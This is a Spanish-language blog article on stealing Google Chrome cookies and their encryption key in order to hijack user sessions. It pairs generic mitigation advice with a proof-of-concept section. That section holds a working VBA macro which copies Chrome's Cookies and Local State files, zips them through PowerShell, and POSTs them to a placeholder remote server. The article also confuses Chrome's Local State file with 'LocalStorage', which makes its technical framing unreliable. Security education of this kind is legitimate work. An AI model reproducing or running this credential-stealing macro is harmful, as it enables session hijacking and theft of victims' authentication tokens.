LocalStorage: El Lado Oscuro de las Cookies de Chrome. Cómo Evitar que los MALOS Accedan a tus Datos mediante el Archivo Local

Añadir un comentario
  1. Introducción
  2. Acceso no Autorizado y Extracción de Datos
  3. Descifrado y Secuestro de Sesiones
  4. Estrategias de Mitigación
  5. Prueba de concepto (PoC)
  6. Conclusión

Los navegadores web almacenan datos de sesión en cookies cifradas, pero una vulnerabilidad en el LocalStorage de Google Chrome podría permitir el acceso a la clave de cifrado y la extracción de datos sensibles. En este artículo, mostramos cómo un atacante podría enviar la clave de cifrado a un servidor remoto y descifrar las cookies para secuestrar las sesiones del usuario. También proponemos algunas medidas de seguridad para prevenir este tipo de ataques.

Introducción

Los navegadores web almacenan datos valiosos del usuario, incluida información de sesión, en cookies para mantener el estado y proporcionar experiencias personalizadas. Para proteger estos datos, los navegadores utilizan cifrado, y Google Chrome utiliza el mecanismo de LocalStorage para almacenar la clave de cifrado de manera segura. Sin embargo, un error en la implementación o una vulnerabilidad en el sistema podrían permitir el acceso no autorizado a la clave de cifrado y, en consecuencia, la decodificación de datos de sesión sensibles. Este artículo explora un posible escenario de ataque y sus implicaciones en la privacidad y seguridad del usuario.

Acceso no Autorizado y Extracción de Datos

El código proporcionado muestra un método para copiar el archivo Cookies y el archivo Local State, que contiene la clave de cifrado, en una carpeta temporal. A continuación, el script crea un archivo ZIP que contiene los archivos copiados y lo envía a una ubicación predeterminada. En este escenario hipotético, asumimos que el atacante puede utilizar ngrok, un servicio que permite que los servidores locales se expongan a Internet, para transferir el archivo ZIP a un servidor remoto bajo su control.

Descifrado y Secuestro de Sesiones

Una vez que el archivo Cookies cifrado llega al servidor del atacante, pueden utilizar la clave de cifrado obtenida del archivo Local State para descifrar su contenido. Los datos descifrados pueden incluir identificadores de sesión, tokens de autenticación y otra información sensible que se puede utilizar para suplantar a la víctima y secuestrar sus sesiones activas en varios sitios web.

Estrategias de Mitigación

Para protegerse contra estas vulnerabilidades, se recomiendan varias estrategias de mitigación:

a. Actualizaciones de Software Regulares: Mantener el navegador web y el sistema operativo actualizados para asegurarse de que las vulnerabilidades conocidas se corrijan rápidamente.

b. Acceso Limitado al LocalStorage: Los sitios web deben seguir las mejores prácticas y evitar almacenar datos sensibles en el LocalStorage, reduciendo así el riesgo de exposición.

c. Política de Seguridad de Contenido (CSP): Implementar una CSP sólida para evitar que se ejecuten scripts no autorizados en los sitios web, reduciendo el riesgo de ataques de ingeniería social.

d. Cookies Cifradas: Los desarrolladores deben considerar implementar cifrado de extremo a extremo para las cookies para garantizar la confidencialidad de los datos incluso si la clave de cifrado se ve comprometida.

e. Autenticación de Dos Factores (2FA): Animar a los usuarios a habilitar el 2FA siempre que sea posible, agregando una capa adicional de seguridad a sus cuentas.

f. Capacitación de Conciencia del Usuario: Educar a los usuarios sobre los posibles riesgos de seguridad y las técnicas de ingeniería social para evitar caer víctima de tales ataques.

Prueba de concepto (PoC)

Option Explicit

Sub SendFilesToServer()
    Dim chromeDir As String
    Dim localStateFile As String
    Dim outputZipFile As String
    Dim tempFolder As String
    Dim zipFile As String
    
    On Error Resume Next
    
    ' Rutas de los archivos y carpetas
    chromeDir = Environ("LOCALAPPDATA") & "\Google\Chrome\User Data\Default\Network"
    localStateFile = Environ("LOCALAPPDATA") & "\Google\Chrome\User Data\Local State"
    outputZipFile = Environ("TEMP") & "\output.zip"
    tempFolder = Environ("TEMP") & "\chrome_temp"
    
    ' Verificar si existen los archivos
    If Dir(chromeDir, vbDirectory) = "" Or Dir(localStateFile) = "" Then
        MsgBox "Chrome user data directory or Local State file not found.", vbExclamation
        Exit Sub
    End If
    
    ' Borrar el archivo ZIP si existe
    If Dir(outputZipFile) <> "" Then
        Kill outputZipFile
    End If
    
    ' Crear la carpeta temporal
    MkDir tempFolder
    
    ' Copiar el archivo Cookies a la carpeta temporal
    FileCopy chromeDir & "\Cookies", tempFolder & "\Cookies"
    
    ' Copiar el archivo Local State a la carpeta temporal
    FileCopy localStateFile, tempFolder & "\Local State"
    
    ' Crear el archivo ZIP usando PowerShell
    zipFile = Environ("TEMP") & "\Compressed.zip"
    Shell "powershell -noprofile -command ""Compress-Archive -Path '" & tempFolder & "\*' -DestinationPath '" & zipFile & "'"""
    
    ' Enviar el archivo ZIP a través de una solicitud POST (Reemplazar URL_del_Servidor con la URL correcta)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    xmlhttp.Open "POST", "URL_del_Servidor", False
    xmlhttp.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    xmlhttp.send "data=" & ReadFile(zipFile)
    
    ' Eliminar la carpeta temporal
    On Error Resume Next
    Kill zipFile
    Kill tempFolder & "\Cookies"
    Kill tempFolder & "\Local State"
    RmDir tempFolder
    
    MsgBox "Files sent successfully.", vbInformation
End Sub

Function ReadFile(filePath As String) As String
    Dim fileNumber As Integer
    Dim fileContent As String
    
    fileNumber = FreeFile
    Open filePath For Binary Access Read As fileNumber
    fileContent = Space$(LOF(fileNumber))
    Get fileNumber, , fileContent
    Close fileNumber
    
    ReadFile = fileContent
End Function

Conclusión

Este artículo de investigación destaca las posibles vulnerabilidades asociadas con el acceso al LocalStorage en navegadores web y los riesgos de exponer la clave de cifrado de las cookies en Google Chrome. Se demuestra cómo el acceso no autorizado a la clave de cifrado puede llevar a la extracción de datos y al secuestro de sesiones. Al seguir las estrategias de mitigación recomendadas, los usuarios y desarrolladores pueden mejorar la seguridad de su experiencia de navegación y protegerse contra posibles amenazas planteadas por tales vulnerabilidades. Es fundamental que la comunidad de ciberseguridad se mantenga vigilante y proactiva para proteger los datos y la privacidad del usuario en el cambiante panorama digital.

Avatar de Desconocido

Publicado por Osvaldo Hernández

Ingeniero en sistemas computacionales por el Instituto Politécnico Nacional, profesor particular de ciencias e idiomas, actualmente es divulgador científico, tecnológico y cultural en Cognus Education.

Deja un comentario